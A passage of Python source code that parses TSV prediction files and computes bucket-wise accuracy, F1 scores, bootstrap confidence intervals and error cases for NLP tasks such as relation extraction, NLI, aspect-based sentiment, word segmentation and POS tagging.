            pred_label_list.append(fields[2])
    return sent_list, true_label_list, pred_label_list
def file_to_list_re(file_path):
    """Parse a relation-extraction TSV whose first row is a header.

    Columns used: 0=sentence, 1=entity pair, 3=true label, 4=predicted label.
    Fixes: the file is now closed (context manager); the redundant
    `[info for info in info_list]` copy was simplified to list().
    """
    sample_list = []
    true_list = []
    pred_list = []
    sent_list = []
    entity_list = []
    with open(file_path, "r") as fin:
        for idx, line in enumerate(fin):
            if idx == 0:
                # skip header row
                continue
            info_list = line.rstrip("\n").split("\t")
            sample_list.append(list(info_list))
            true_list.append(info_list[3])
            pred_list.append(info_list[4])
            sent_list.append(info_list[0])
            entity_list.append(info_list[1])
    return sample_list, sent_list, entity_list, true_list, pred_list
def file_to_list_nli(path_file):
    """Parse an NLI TSV: sentence1, sentence2, true label, predicted label.

    Rows with fewer than 4 tab-separated fields are skipped; extra columns
    are tolerated and ignored. Fixes: context-managed file; single split.
    """
    sent1_list = []
    sent2_list = []
    true_label_list = []
    pred_label_list = []
    with open(path_file, "r") as fin:
        for line in fin:
            fields = line.rstrip("\n").split("\t")
            if len(fields) < 4:
                continue
            sent1_list.append(fields[0])
            sent2_list.append(fields[1])
            true_label_list.append(fields[2])
            pred_label_list.append(fields[3])
    return sent1_list, sent2_list, true_label_list, pred_label_list
def file_to_list_absa(path_file):
    """Parse an ABSA TSV: aspect, sentence, true label, predicted label.

    Rows with fewer than 4 tab-separated fields are skipped; extra columns
    are tolerated and ignored. Fixes: context-managed file; single split.
    """
    sent1_list = []
    sent2_list = []
    true_label_list = []
    pred_label_list = []
    with open(path_file, "r") as fin:
        for line in fin:
            fields = line.rstrip("\n").split("\t")
            if len(fields) < 4:
                continue
            sent1_list.append(fields[0])
            sent2_list.append(fields[1])
            true_label_list.append(fields[2])
            pred_label_list.append(fields[3])
    return sent1_list, sent2_list, true_label_list, pred_label_list
def file_to_list_summ(path_file):
    """Parse a summarization TSV with at least 9 columns:
    document, hypothesis, reference, R1/R2/RL (per-sample), R1/R2/RL (overall).

    Fixes: context-managed file handle; each line is split once instead of
    nine times; removed unused sent/true_label/pred_label locals.
    """
    doc_list = []
    hyp_list = []
    ref_list = []
    r1 = []
    r2 = []
    rl = []
    r1_overall = []
    r2_overall = []
    rl_overall = []
    with open(path_file, "r") as fin:
        for line in fin:
            fields = line.rstrip("\n").split("\t")
            if len(fields) < 9:
                continue
            doc_list.append(fields[0])
            hyp_list.append(fields[1])
            ref_list.append(fields[2])
            r1.append(fields[3])
            r2.append(fields[4])
            rl.append(fields[5])
            r1_overall.append(fields[6])
            r2_overall.append(fields[7])
            rl_overall.append(fields[8])
    return doc_list, hyp_list, ref_list, r1, r2, rl, r1_overall, r2_overall, rl_overall
def file2listPair(path_file):
    """Parse a 2-column TSV into parallel (sent1, sent2) lists.

    Fix: context-managed file handle; single split per line.
    NOTE(review): unlike the other readers, a line with fewer than two
    columns still raises IndexError — matching the original behavior.
    """
    sent1_list = []
    sent2_list = []
    with open(path_file, "r") as fin:
        for line in fin:
            fields = line.rstrip("\n").split("\t")
            sent1_list.append(fields[0])
            sent2_list.append(fields[1])
    return sent1_list, sent2_list
def file2list_firstColumn(path_file):
    """Collect the first tab-separated column of every line.

    Fix: context-managed file handle.
    """
    with open(path_file, "r") as fin:
        return [line.rstrip("\n").split("\t")[0] for line in fin]
def file2dict(path_file):
    """Parse a 2-column TSV into {sent_id: sent}.

    Fix: context-managed file handle. Each line must contain exactly one
    tab (ValueError otherwise, matching the original behavior).
    """
    res_dict = {}
    with open(path_file, "r") as fin:
        for line in fin:
            sent_id, sent = line.rstrip("\n").split("\t")
            res_dict[sent_id] = sent
    return res_dict
def read_tag_pos(file):
    """Read a POS tag file (one tag per line, blank line = sentence break),
    prefixing every tag with "B-".

    Returns (per-sentence tag lists, flat tag list)."""
    labels = []
    example = []
    labels_holistic = []
    with open(file, 'r') as f:
        for raw in f:
            tag = raw.strip()
            if not tag:
                labels.append(example)
                example = []
                continue
            example.append("B-" + tag)
            labels_holistic.append("B-" + tag)
    if example:
        labels.append(example)
    return labels, labels_holistic
# def read_tag(file):
# labels = []
# example = []
# with open(file, 'r') as f:
# for line in f:
# line = line.strip()
# if line:
# example.append(line)
# else:
# labels.append(example)
# example = []
# if example:
# labels.append(example)
# return labels
def read_text_pos(file):
    """Read tokens (first tab column of each line; blank line = sentence
    break). Returns (per-sentence token lists, flat token list)."""
    labels = []
    example = []
    labels_holistic = []
    with open(file, 'r') as f:
        for raw in f:
            stripped = raw.strip()
            if not stripped:
                labels.append(example)
                example = []
                continue
            token = stripped.split("\t")[0]
            example.append(token)
            labels_holistic.append(token)
    if example:
        labels.append(example)
    return labels, labels_holistic
def read_tag(file):
    """Read tags (one per line; blank line = sentence break).
    Returns (per-sentence tag lists, flat tag list)."""
    labels = []
    example = []
    labels_holistic = []
    with open(file, 'r') as f:
        for raw in f:
            tag = raw.strip()
            if tag:
                example.append(tag)
                labels_holistic.append(tag)
            else:
                labels.append(example)
                example = []
    if example:
        labels.append(example)
    return labels, labels_holistic
def read_single_column(file, k):
    """Read column `k` (tab-separated) of each non-blank line; blank line =
    sentence break. Lines without exactly 3 columns are echoed to stdout
    for debugging but still indexed. Returns (per-sentence lists, flat list)."""
    labels = []
    example = []
    labels_holistic = []
    with open(file, 'r') as f:
        for raw in f:
            stripped = raw.strip()
            if stripped:
                if len(stripped.split("\t")) != 3:
                    print(stripped)
                value = stripped.split("\t")[k]
                example.append(value)
                labels_holistic.append(value)
            else:
                labels.append(example)
                example = []
    if example:
        labels.append(example)
    return labels, labels_holistic
def bucc_f1(labels, predictions, language=None):
    """F1/precision/recall (percent) over tab-separated pair strings,
    computed by set intersection of gold and predicted pairs."""
    gold = {tuple(item.split('\t')) for item in labels}
    guessed = {tuple(item.split('\t')) for item in predictions}
    ncorrect = len(gold & guessed)
    if ncorrect > 0:
        precision = ncorrect / len(guessed)
        recall = ncorrect / len(gold)
        f1 = 2 * precision * recall / (precision + recall)
    else:
        precision = recall = f1 = 0
    return {'f1': f1 * 100, 'precision': precision * 100, 'recall': recall * 100}
def f1(labels, predictions, language=None):
    """Binary F1/precision/recall (in percent) via scikit-learn."""
    raw_scores = {
        'f1': f1_score(labels, predictions),
        'precision': precision_score(labels, predictions),
        'recall': recall_score(labels, predictions),
    }
    return {name: value * 100 for name, value in raw_scores.items()}
def format4json_tc(sent):
    """Sanitize a sentence for safe JSON embedding: remove quoting/escape
    characters (colons become spaces), then truncate to 520 words."""
    for old, new in ((":", " "), ("\"", ""), ("\'", ""), ("/", ""),
                     ("\\", ""), ("{", ""), ("}", "")):
        sent = sent.replace(old, new)
    for old in ("\"", "\\n", "\\n\\n", "\\\"\"\""):
        sent = sent.replace(old, "")
    if len(sent.split(" ")) > 521:
        sent = " ".join(sent.split(" ")[:520]) + " ... "
    return sent
def getErrorCase_tc(sent_list, true_label_list, pred_label_list):
    """Collect "true|||pred|||sentence" strings for misclassified samples."""
    cases = []
    for sent, gold, guess in zip(sent_list, true_label_list, pred_label_list):
        if gold == guess:
            continue
        cases.append(gold + "|||" + guess + "|||" + format4json_tc(sent))
    return cases
def getErrorCase_re(sent_list, entity_list, true_label_list, pred_label_list):
    """Collect "true|||pred|||entities|||sentence" strings for RE errors."""
    cases = []
    rows = zip(sent_list, entity_list, true_label_list, pred_label_list)
    for sent, entities, gold, guess in rows:
        if gold != guess:
            cases.append(gold + "|||" + guess + "|||" + entities + "|||" + format4json_tc(sent))
    return cases
def getBucketAcc_with_errorCase(dict_bucket2span, dict_bucket2span_pred, dict_sid2sent, is_print_ci, is_print_case):
    """Per-bucket accuracy with optional bootstrap CI and error cases.

    Span format: "sid|||label", where sid is the sentence id and label the
    class assigned to that instance.
    """
    bucket2result = {}
    for interval, gold_spans in dict_bucket2span.items():
        if interval not in dict_bucket2span_pred:
            raise ValueError("Predict Label Bucketing Errors")
        pred_spans = dict_bucket2span_pred[interval]
        # collect misclassified samples from this bucket
        error_cases = []
        if is_print_case:
            for gold_info, pred_info in zip(gold_spans, pred_spans):
                sid_g, label_g = gold_info.split("|||")
                sid_p, label_p = pred_info.split("|||")
                if sid_g != sid_p:
                    continue
                sent = dict_sid2sent[sid_g]
                if label_g != label_p:
                    error_cases.append(label_g + "|||" + label_p + "|||" + sent)
        acc = accuracy(pred_spans, gold_spans)
        ci_low, ci_up = 0, 0
        if is_print_ci:
            ci_low, ci_up = compute_confidence_interval_acc(pred_spans, gold_spans)
        bucket2result[interval] = [acc, len(gold_spans), ci_low, ci_up, error_cases]
    return sortDict(bucket2result)
def getBucketAcc_with_errorCase_re(dict_bucket2span, dict_bucket2span_pred, dict_sid2sent, is_print_ci, is_print_case):
    """Per-bucket RE accuracy with optional bootstrap CI and error cases.

    Span format: "sid|||label"; dict_sid2sent maps the sentence id to the
    sentence-with-entities string used in error cases.
    """
    bucket2result = {}
    for interval, gold_spans in dict_bucket2span.items():
        if interval not in dict_bucket2span_pred:
            raise ValueError("Predict Label Bucketing Errors")
        pred_spans = dict_bucket2span_pred[interval]
        # collect misclassified samples from this bucket
        error_cases = []
        if is_print_case:
            for gold_info, pred_info in zip(gold_spans, pred_spans):
                sid_g, label_g = gold_info.split("|||")
                sid_p, label_p = pred_info.split("|||")
                if sid_g != sid_p:
                    continue
                sent_entities = dict_sid2sent[sid_g]
                if label_g != label_p:
                    error_cases.append(label_g + "|||" + label_p + "|||" + sent_entities)
        acc = accuracy(pred_spans, gold_spans)
        ci_low, ci_up = 0, 0
        if is_print_ci:
            ci_low, ci_up = compute_confidence_interval_acc(pred_spans, gold_spans)
        bucket2result[interval] = [acc, len(gold_spans), ci_low, ci_up, error_cases]
    return sortDict(bucket2result)
def getErrorCase_nli(sent1_list, sent2_list, true_label_list, pred_label_list):
    """Collect "true|||pred|||sent1|||sent2" strings for NLI errors."""
    cases = []
    rows = zip(sent1_list, sent2_list, true_label_list, pred_label_list)
    for premise, hypothesis, gold, guess in rows:
        if gold != guess:
            cases.append(gold + "|||" + guess + "|||" + format4json_tc(premise) + "|||" + format4json_tc(hypothesis))
    return cases
def getBucketAcc_with_errorCase_nli(dict_bucket2span, dict_bucket2span_pred, dict_sid2sentpair, is_print_ci, is_print_case):
    """Per-bucket NLI accuracy with optional bootstrap CI and error cases.

    Span format: "sid|||label"; dict_sid2sentpair maps the sentence id to
    the premise/hypothesis pair string used in error cases.
    """
    bucket2result = {}
    for interval, gold_spans in dict_bucket2span.items():
        if interval not in dict_bucket2span_pred:
            raise ValueError("Predict Label Bucketing Errors")
        pred_spans = dict_bucket2span_pred[interval]
        # collect misclassified samples from this bucket
        error_cases = []
        if is_print_case:
            for gold_info, pred_info in zip(gold_spans, pred_spans):
                sid_g, label_g = gold_info.split("|||")
                sid_p, label_p = pred_info.split("|||")
                if sid_g != sid_p:
                    continue
                sent = dict_sid2sentpair[sid_g]
                if label_g != label_p:
                    error_cases.append(label_g + "|||" + label_p + "|||" + sent)
        acc = accuracy(pred_spans, gold_spans)
        ci_low, ci_up = 0, 0
        if is_print_ci:
            ci_low, ci_up = compute_confidence_interval_acc(pred_spans, gold_spans)
        bucket2result[interval] = [acc, len(gold_spans), ci_low, ci_up, error_cases]
    return sortDict(bucket2result)
def getErrorCase_absa(aspect_list, sent_list, true_label_list, pred_label_list):
    """Collect "true|||pred|||aspect|||sentence" strings for ABSA errors."""
    cases = []
    rows = zip(aspect_list, sent_list, true_label_list, pred_label_list)
    for aspect, sent, gold, guess in rows:
        if gold != guess:
            cases.append(gold + "|||" + guess + "|||" + format4json_tc(aspect) + "|||" + format4json_tc(sent))
    return cases
def getBucketAcc_with_errorCase_absa(dict_bucket2span, dict_bucket2span_pred, dict_sid2sentpair, is_print_ci, is_print_case):
    """Per-bucket ABSA accuracy with optional bootstrap CI and error cases.

    Span format: "sid|||label"; dict_sid2sentpair maps the sentence id to
    the aspect/sentence pair string used in error cases.
    """
    bucket2result = {}
    for interval, gold_spans in dict_bucket2span.items():
        if interval not in dict_bucket2span_pred:
            raise ValueError("Predict Label Bucketing Errors")
        pred_spans = dict_bucket2span_pred[interval]
        # collect misclassified samples from this bucket
        error_cases = []
        if is_print_case:
            for gold_info, pred_info in zip(gold_spans, pred_spans):
                sid_g, label_g = gold_info.split("|||")
                sid_p, label_p = pred_info.split("|||")
                if sid_g != sid_p:
                    continue
                sent = dict_sid2sentpair[sid_g]
                if label_g != label_p:
                    error_cases.append(label_g + "|||" + label_p + "|||" + sent)
        acc = accuracy(pred_spans, gold_spans)
        ci_low, ci_up = 0, 0
        if is_print_ci:
            ci_low, ci_up = compute_confidence_interval_acc(pred_spans, gold_spans)
        bucket2result[interval] = [acc, len(gold_spans), ci_low, ci_up, error_cases]
        print("accuracy_each_bucket:\t", acc)
    return sortDict(bucket2result)
# 1000
def compute_confidence_interval_f1_cws(spans_true, spans_pred, dict_span2sid, dict_span2sid_pred, n_times=1000):
    """Bootstrap a confidence interval for chunk-level F1 (CWS task).

    Resamples sentence ids `n_times` and re-evaluates F1 on each resample.
    With the default n_times=1000 the empirical 2.5%/97.5% percentiles are
    read from the sorted scores; otherwise a normal-approximation interval
    (mean_confidence_interval) is used.

    NOTE(review): the percentile indices 24/974 assume exactly 1000
    resamples; also, a gold span id with fewer than 3 "|||" fields aborts
    the whole gold-side grouping (`break`) — confirm that `continue` was
    not intended.
    """
    n_data = len(dict_span2sid)
    sample_rate = get_sample_rate(n_data)
    n_sampling = int(n_data * sample_rate)
    print("sample_rate:\t", sample_rate)
    print("n_sampling:\t", n_sampling)
    # group gold spans by sentence id
    dict_sid2span_salient = {}
    for span in spans_true:
        if len(span.split("|||"))!=3:
            break
        sid = dict_span2sid[span]
        if sid in dict_sid2span_salient.keys():
            dict_sid2span_salient[sid].append(span)
        else:
            dict_sid2span_salient[sid] = [span]
    # group predicted spans by sentence id
    dict_sid2span_salient_pred = {}
    for span in spans_pred:
        sid = dict_span2sid_pred[span]
        if sid in dict_sid2span_salient_pred.keys():
            dict_sid2span_salient_pred[sid].append(span)
        else:
            dict_sid2span_salient_pred[sid] = [span]
    performance_list = []
    confidence_low, confidence_up = 0,0
    for i in range(n_times):
        # sample sentence ids with replacement
        sample_index_list = choices(range(n_data), k=n_sampling)
        true_label_bootstrap_list = []
        pred_label_bootstrap_list = []
        for ind, sid in enumerate(sample_index_list):
            # suffix spans with the resample position so that repeated
            # sentences contribute distinct span ids
            if sid in dict_sid2span_salient.keys():
                true_label_list = dict_sid2span_salient[sid]
                true_label_list_revised = [true_label + "|||" + str(ind) for true_label in true_label_list]
                true_label_bootstrap_list += true_label_list_revised
            if sid in dict_sid2span_salient_pred.keys():
                pred_label_list = dict_sid2span_salient_pred[sid]
                pred_label_list_revised = [pred_label + "|||" + str(ind) for pred_label in pred_label_list]
                pred_label_bootstrap_list += pred_label_list_revised
        f1, p, r = evaluate_chunk_level(pred_label_bootstrap_list, true_label_bootstrap_list)
        performance_list.append(f1)
    if n_times != 1000:
        confidence_low, confidence_up = mean_confidence_interval(performance_list)
    else:
        # empirical 2.5th / 97.5th percentile of the 1000 bootstrap scores
        performance_list.sort()
        confidence_low = performance_list[24]
        confidence_up = performance_list[974]
    return confidence_low, confidence_up
# dict_chunkid2spanSent: "start|||end|||tag" -> span text plus its sentence
# dict_pos2tag: "start|||end" -> tag
def get_errorCase_cws(dict_pos2tag, dict_pos2tag_pred, dict_chunkid2spanSent, dict_chunkid2spanSent_pred, list_true_tags_token, list_pred_tags_token):
    """Collect error cases for Chinese word segmentation.

    Returns strings of the form "span_sentence|||true|||pred". When one side
    has no chunk at a position, its label is reconstructed by concatenating
    that side's token-level tags over the span's [start, end) range.
    """
    errorCase_list = []
    # pass 1: gold chunks whose predicted tag differs (or is absent)
    for pos, tag in dict_pos2tag.items():
        true_label = tag
        pred_label = ""
        if pos+"|||"+tag not in dict_chunkid2spanSent.keys():
            continue
        span_sentence = dict_chunkid2spanSent[pos+"|||"+tag]
        if pos in dict_pos2tag_pred.keys():
            pred_label = dict_pos2tag_pred[pos]
            if true_label == pred_label:
                continue
        else:
            # no predicted chunk here: rebuild the label from the
            # token-level predicted tags over [start, end)
            start = int(pos.split("|||")[0])
            end = int(pos.split("|||")[1])
            pred_label = "".join(list_pred_tags_token[start:end])
        error_case = span_sentence + "|||" + true_label + "|||" + pred_label
        errorCase_list.append(error_case)
    # pass 2: predicted chunks whose gold tag differs (or is absent)
    for pos, tag in dict_pos2tag_pred.items():
        true_label = ""
        pred_label = tag
        if pos+"|||"+tag not in dict_chunkid2spanSent_pred.keys():
            continue
        span_sentence = dict_chunkid2spanSent_pred[pos+"|||"+tag]
        if pos in dict_pos2tag.keys():
            true_label = dict_pos2tag[pos]
            if true_label == pred_label:
                continue
        else:
            # no gold chunk here: rebuild from token-level gold tags
            start = int(pos.split("|||")[0])
            end = int(pos.split("|||")[1])
            true_label = "".join(list_true_tags_token[start:end])
        error_case = span_sentence + "|||" + true_label + "|||" + pred_label
        errorCase_list.append(error_case)
    return errorCase_list
################ Calculate Bucket-wise F1 Score:
def getBucketF1_cws(dict_bucket2span, dict_bucket2span_pred, dict_span2sid, dict_span2sid_pred, dict_chunkid2span, dict_chunkid2span_pred, list_true_tags_token, list_pred_tags_token, is_print_ci, is_print_case):
    """Bucket-wise chunk-level F1 for Chinese word segmentation.

    Span id format: "start|||end|||tag". Returns (sorted bucket dict,
    corpus-level error-case list); each bucket entry is
    [f1, #gold_spans, ci_low, ci_up, error_entity_list].
    """
    dict_bucket2f1 = {}
    # predicted: "start|||end" -> tag (only needed for error-case reporting)
    dict_pos2tag_pred = {}
    if is_print_case:
        for k_bucket_eval, spans_pred in dict_bucket2span_pred.items():
            for span_pred in spans_pred:
                pos_pred = "|||".join(span_pred.split("|||")[0:2])
                tag_pred = span_pred.split("|||")[-1]
                dict_pos2tag_pred[pos_pred] = tag_pred
    # gold: "start|||end" -> tag
    dict_pos2tag = {}
    if is_print_case:
        for k_bucket_eval, spans in dict_bucket2span.items():
            for span in spans:
                pos = "|||".join(span.split("|||")[0:2])
                tag = span.split("|||")[-1]
                dict_pos2tag[pos] = tag
    errorCase_list = []
    if is_print_case:
        errorCase_list = get_errorCase_cws(dict_pos2tag, dict_pos2tag_pred, dict_chunkid2span, dict_chunkid2span_pred, list_true_tags_token, list_pred_tags_token)
    for bucket_interval, spans_true in dict_bucket2span.items():
        spans_pred = []
        if bucket_interval not in dict_bucket2span_pred.keys():
            raise ValueError("Predict Label Bucketing Errors")
        else:
            spans_pred = dict_bucket2span_pred[bucket_interval]
        confidence_low, confidence_up = 0,0
        if is_print_ci:
            # bootstrap confidence interval over sentence ids
            confidence_low, confidence_up = compute_confidence_interval_f1_cws(spans_true, spans_pred, dict_span2sid, dict_span2sid_pred)
            confidence_low = format(confidence_low , '.3g')
            confidence_up = format(confidence_up, '.3g')
        f1, p, r = evaluate_chunk_level(spans_pred, spans_true)
        error_entity_list = []
        if is_print_case:
            for span_true in spans_true:
                if span_true not in spans_pred:
                    pos_true = "|||".join(span_true.split("|||")[0:2])
                    tag_true = span_true.split("|||")[-1]
                    if pos_true in dict_pos2tag_pred.keys():
                        tag_pred = dict_pos2tag_pred[pos_true]
                        if tag_pred != tag_true:
                            error_entity_list.append(dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + dict_pos2tag_pred[pos_true])
                    else:
                        # no predicted chunk here: rebuild the label from
                        # token-level predicted tags over [start, end)
                        start = int(pos_true.split("|||")[0])
                        end = int(pos_true.split("|||")[1])
                        pred_label = "".join(list_pred_tags_token[start:end])
                        error_entity_list.append(dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + pred_label)
        dict_bucket2f1[bucket_interval] = [f1, len(spans_true), confidence_low, confidence_up, error_entity_list]
    return sortDict(dict_bucket2f1), errorCase_list
# dict_chunkid2spanSent: 2_3 -> New York|||This is New York city
# dict_pos2tag: 2_3 -> NER
def get_errorCase_pos(dict_pos2tag, dict_pos2tag_pred, dict_chunkid2spanSent, dict_chunkid2spanSent_pred):
    """Collect "sentence|||true|||pred" strings for POS positions where a
    prediction exists and differs from the gold tag.

    Positions with no prediction at all are skipped (not reported as "O").
    dict_chunkid2spanSent_pred is accepted for interface symmetry and unused.
    """
    cases = []
    for pos, gold_tag in dict_pos2tag.items():
        chunk_key = pos + "_" + gold_tag
        if chunk_key not in dict_chunkid2spanSent:
            continue
        if pos not in dict_pos2tag_pred:
            continue
        pred_tag = dict_pos2tag_pred[pos]
        if pred_tag == gold_tag:
            continue
        span_sentence = dict_chunkid2spanSent[chunk_key]
        cases.append(format4json_tc(span_sentence) + "|||" + gold_tag + "|||" + pred_tag)
    return cases
# 1000
def compute_confidence_interval_f1_pos(spans_true, spans_pred, dict_span2sid, dict_span2sid_pred, n_times=100):
    """Bootstrap a confidence interval for span-level F1 (POS task).

    Resamples sentence ids with replacement n_times, rebuilds gold/predicted
    span lists for each sample, and derives (confidence_low, confidence_up)
    from the resulting F1 scores.
    """
    n_data = len(dict_span2sid)
    sample_rate = get_sample_rate(n_data)
    n_sampling = int(n_data * sample_rate)
    print("sample_rate:\t", sample_rate)
    print("n_sampling:\t", n_sampling)
    # Group gold spans by their sentence id.
    dict_sid2span_salient = {}
    for span in spans_true:
        #print(span)
        # NOTE(review): `break` aborts the whole grouping loop on the first
        # span that is not "start_end_tag"-shaped; `continue` may be the
        # intent — confirm.
        if len(span.split("_"))!=3:
            break
        sid = dict_span2sid[span]
        if sid in dict_sid2span_salient.keys():
            dict_sid2span_salient[sid].append(span)
        else:
            dict_sid2span_salient[sid] = [span]
    # Group predicted spans by their sentence id.
    dict_sid2span_salient_pred = {}
    for span in spans_pred:
        sid = dict_span2sid_pred[span]
        if sid in dict_sid2span_salient_pred.keys():
            dict_sid2span_salient_pred[sid].append(span)
        else:
            dict_sid2span_salient_pred[sid] = [span]
    performance_list = []
    confidence_low, confidence_up = 0,0
    for i in range(n_times):
        # Draw sentence ids with replacement (one bootstrap sample).
        sample_index_list = choices(range(n_data), k=n_sampling)
        true_label_bootstrap_list = []
        pred_label_bootstrap_list = []
        for ind, sid in enumerate(sample_index_list):
            if sid in dict_sid2span_salient.keys():
                true_label_list = dict_sid2span_salient[sid]
                # Suffix the draw index so a sentence drawn twice yields
                # distinct span identities.
                true_label_list_revised = [true_label + "_" + str(ind) for true_label in true_label_list]
                true_label_bootstrap_list += true_label_list_revised
            if sid in dict_sid2span_salient_pred.keys():
                pred_label_list = dict_sid2span_salient_pred[sid]
                pred_label_list_revised = [pred_label + "_" + str(ind) for pred_label in pred_label_list]
                pred_label_bootstrap_list += pred_label_list_revised
        f1, p, r = evaluate_chunk_level(pred_label_bootstrap_list, true_label_bootstrap_list)
        performance_list.append(f1)
    if n_times != 1000:
        # Too few samples for percentiles: mean-based interval.
        confidence_low, confidence_up = mean_confidence_interval(performance_list)
    else:
        # Exactly 1000 samples: empirical 2.5% / 97.5% percentiles.
        performance_list.sort()
        confidence_low = performance_list[24]
        confidence_up = performance_list[974]
    # print("\n")
    # print("confidence_low:\t", confidence_low)
    # print("confidence_up:\t", confidence_up)
    return confidence_low, confidence_up
def getBucketF1_pos(dict_bucket2span, dict_bucket2span_pred, dict_span2sid, dict_span2sid_pred, dict_chunkid2span, dict_chunkid2span_pred, is_print_ci, is_print_case):
    """Compute per-bucket F1 for the POS task.

    Returns (sorted {bucket: [f1, n_true_spans, ci_low, ci_up, error_entities]},
    errorCase_list). Confidence intervals are only computed when is_print_ci is
    truthy; error cases only when is_print_case is truthy.
    """
    errorCase_list = []
    dict_bucket2f1 = {}
    # predict: 2_3 -> NER
    dict_pos2tag_pred = {}
    if is_print_case:
        for k_bucket_eval, spans_pred in dict_bucket2span_pred.items():
            for span_pred in spans_pred:
                # Span format "start_end_tag": key is "start_end", value is the tag.
                pos_pred = "_".join(span_pred.split("_")[0:2])
                tag_pred = span_pred.split("_")[-1]
                dict_pos2tag_pred[pos_pred] = tag_pred
    #print(dict_pos2tag_pred)
    # true: 2_3 -> NER
    dict_pos2tag = {}
    if is_print_case:
        for k_bucket_eval, spans in dict_bucket2span.items():
            for span in spans:
                pos = "_".join(span.split("_")[0:2])
                tag = span.split("_")[-1]
                dict_pos2tag[pos] = tag
    # print(dict_pos2tag_pred)
    if is_print_case:
        errorCase_list = get_errorCase_pos(dict_pos2tag, dict_pos2tag_pred, dict_chunkid2span, dict_chunkid2span_pred)
    for bucket_interval, spans_true in dict_bucket2span.items():
        spans_pred = []
        #print('bucket_interval: ',bucket_interval)
        # Every gold bucket must also exist on the prediction side.
        if bucket_interval not in dict_bucket2span_pred.keys():
            #print(bucket_interval)
            raise ValueError("Predict Label Bucketing Errors")
        else:
            spans_pred = dict_bucket2span_pred[bucket_interval]
        confidence_low, confidence_up = 0,0
        if is_print_ci:
            confidence_low, confidence_up = compute_confidence_interval_f1_pos(spans_true, spans_pred, dict_span2sid, dict_span2sid_pred)
        # Render interval bounds with 3 significant digits.
        confidence_low = format(confidence_low , '.3g')
        confidence_up = format(confidence_up, '.3g')
        f1, p, r = evaluate_chunk_level(spans_pred, spans_true)
        error_entity_list = []
        if is_print_case:
            for span_true in spans_true:
                # Gold span missing from predictions: record the mismatch.
                if span_true not in spans_pred:
                    #print(span_true)
                    pos_true = "_".join(span_true.split("_")[0:2])
                    tag_true = span_true.split("_")[-1]
                    if pos_true in dict_pos2tag_pred.keys():
                        tag_pred = dict_pos2tag_pred[pos_true]
                        if tag_pred != tag_true:
                            error_entity_list.append(format4json_tc(dict_chunkid2span[span_true]) + "|||" + tag_true + "|||" + dict_pos2tag_pred[pos_true])
                    else:
                        # No prediction at this position: not reported for POS.
                        #error_entity_list.append(format4json_tc(dict_chunkid2span[span_true]) + "|||" + tag_true + "|||" + "O")
                        continue
        # print("confidence_low:\t", confidence_low)
        # print("confidence_up:\t", confidence_up)
        # print("F1:\t", f1)
        #print(error_entity_list)
        dict_bucket2f1[bucket_interval] = [f1, len(spans_true), confidence_low, confidence_up, error_entity_list]
        # if bucket_interval[0] == 1.0:
        # 	print("debug-f1:",f1)
        # 	print(spans_pred[0:20])
        # 	print(spans_true[0:20])
    # print("dict_bucket2f1: ",dict_bucket2f1)
    return sortDict(dict_bucket2f1), errorCase_list
def getBucketF1_chunk(dict_bucket2span, dict_bucket2span_pred, dict_span2sid, dict_span2sid_pred, dict_chunkid2span, dict_chunkid2span_pred, is_print_ci, is_print_case):
    """Compute per-bucket F1 for the chunking task.

    Returns (sorted {bucket: [f1, n_true_spans, ci_low, ci_up, error_entities]},
    errorCase_list). Unlike the POS variant, a gold span with no prediction at
    its position is reported with tag "O".
    """
    dict_bucket2f1 = {}
    # predict: 2_3 -> NER
    dict_pos2tag_pred = {}
    if is_print_case:
        for k_bucket_eval, spans_pred in dict_bucket2span_pred.items():
            for span_pred in spans_pred:
                # Span format "start_end_tag": key "start_end" -> tag.
                pos_pred = "_".join(span_pred.split("_")[0:2])
                tag_pred = span_pred.split("_")[-1]
                dict_pos2tag_pred[pos_pred] = tag_pred
    # true: 2_3 -> NER
    dict_pos2tag = {}
    if is_print_case:
        for k_bucket_eval, spans in dict_bucket2span.items():
            for span in spans:
                pos = "_".join(span.split("_")[0:2])
                tag = span.split("_")[-1]
                dict_pos2tag[pos] = tag
    errorCase_list = []
    if is_print_case:
        errorCase_list = get_errorCase(dict_pos2tag, dict_pos2tag_pred, dict_chunkid2span, dict_chunkid2span_pred)
    for bucket_interval, spans_true in dict_bucket2span.items():
        spans_pred = []
        #print('bucket_interval: ',bucket_interval)
        # Every gold bucket must also exist on the prediction side.
        if bucket_interval not in dict_bucket2span_pred.keys():
            #print(bucket_interval)
            raise ValueError("Predict Label Bucketing Errors")
        else:
            spans_pred = dict_bucket2span_pred[bucket_interval]
        confidence_low, confidence_up = 0,0
        if is_print_ci:
            confidence_low, confidence_up = compute_confidence_interval_f1(spans_true, spans_pred, dict_span2sid, dict_span2sid_pred)
        # Render interval bounds with 3 significant digits.
        confidence_low = format(confidence_low , '.3g')
        confidence_up = format(confidence_up, '.3g')
        f1, p, r = evaluate_chunk_level(spans_pred, spans_true)
        error_entity_list = []
        if is_print_case:
            for span_true in spans_true:
                # Gold span missing from predictions: record the mismatch.
                if span_true not in spans_pred:
                    #print(span_true)
                    pos_true = "_".join(span_true.split("_")[0:2])
                    tag_true = span_true.split("_")[-1]
                    if pos_true in dict_pos2tag_pred.keys():
                        tag_pred = dict_pos2tag_pred[pos_true]
                        if tag_pred != tag_true:
                            error_entity_list.append(dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + dict_pos2tag_pred[pos_true])
                    else:
                        # No predicted tag at this position: report as "O".
                        error_entity_list.append(dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + "O")
        # print("confidence_low:\t", confidence_low)
        # print("confidence_up:\t", confidence_up)
        # print("F1:\t", f1)
        #print(error_entity_list)
        dict_bucket2f1[bucket_interval] = [f1, len(spans_true), confidence_low, confidence_up, error_entity_list]
        # if bucket_interval[0] == 1.0:
        # 	print("debug-f1:",f1)
        # 	print(spans_pred[0:20])
        # 	print(spans_true[0:20])
    # print("dict_bucket2f1: ",dict_bucket2f1)
    return sortDict(dict_bucket2f1), errorCase_list
def getErrorCase_semp(text_list, sql_true_list, sql_pred_list, is_match_list):
    """Return "text|||gold_sql|||pred_sql" strings for unmatched samples.

    A sample is an error case when its is_match flag equals the string "0".
    """
    samples = zip(text_list, sql_true_list, sql_pred_list, is_match_list)
    return [
        format4json_tc(text) + "|||" + format4json_tc(gold_sql) + "|||" + format4json_tc(pred_sql)
        for text, gold_sql, pred_sql, matched in samples
        if matched == "0"
    ]
def getBucketAcc_with_errorCase_semp(dict_bucket2span, dict_bucket2span_pred, dict_sid2sentpair):
    """Per-bucket accuracy plus error cases for semantic parsing.

